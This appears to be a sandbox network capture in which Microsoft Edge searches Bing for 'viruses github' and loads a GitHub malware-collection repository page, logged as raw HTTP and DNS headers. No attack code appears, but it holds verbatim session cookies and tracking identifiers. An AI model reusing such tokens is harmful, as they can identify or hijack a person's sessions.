User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22RedemptionAnimationState%22%3A%22%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144350790%2C%22Name%22%3A%22AnimationLoad%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22RedemptionAnimationState%22%3A%22%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144350790%2C%22Name%22%3A%22AnimationLoad%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; USRLOC=HS=1&BLOCK=TS=241005160551

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.88777b5c.1728144351.c619e1
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 1027
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:06:03 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.88777b5c.1728144362.c61a11
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 627
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:24 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.88777b5c.1728144444.c67d9b
GET

https://www.bing.com/qbox?query=any&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=0a931cfbbe0a46b9ae5bb50aca72d89c&oit=1&cp=3&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=any&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=0a931cfbbe0a46b9ae5bb50aca72d89c&oit=1&cp=3&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 200 OK

Content-Length: 365
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 67016446ea534006b49e5727a86a369a
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-NCNJGmH2yyIWFX7mTGWrvZbkx3Idfs/JxJFxTBs75Ds='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:07:34 GMT
Connection: keep-alive
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:07:34 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=SID=2AE716EF169962A8223203E017B36354; domain=.bing.com; path=/; HttpOnly
Set-Cookie: SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; domain=.bing.com; expires=Thu, 30-Oct-2025 16:07:34 GMT; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.88777b5c.1728144454.c8bf98
GET

https://www.bing.com/qbox?query=anyd&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=b93ec986adbf4d969f07d902475c2682&oit=1&cp=4&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=anyd&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=b93ec986adbf4d969f07d902475c2682&oit=1&cp=4&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o
DNS

github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
GET

https://github.com/Da2dalus/The-MALWARE-Repo

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: GitHub.com
date: Sat, 05 Oct 2024 16:06:03 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"eb0412dea7060977c7a990eaa55cbe9b"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
set-cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
set-cookie: _octo=GH1.1.2142429092.1728144363; Path=/; Domain=github.com; Expires=Sun, 05 Oct 2025 16:06:03 GMT; Secure; SameSite=Lax
set-cookie: logged_in=no; Path=/; Domain=github.com; Expires=Sun, 05 Oct 2025 16:06:03 GMT; HttpOnly; Secure; SameSite=Lax
accept-ranges: bytes
x-github-request-id: C83D:90F1B:5F77CD:6E3942:670163EB
GET

https://github.com/Da2dalus/The-MALWARE-Repo/security/overall-count

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/security/overall-count HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no

Response

HTTP/2.0 200

server: GitHub.com
date: Sat, 05 Oct 2024 16:06:05 GMT
content-type: text/fragment+html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=14400, private
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
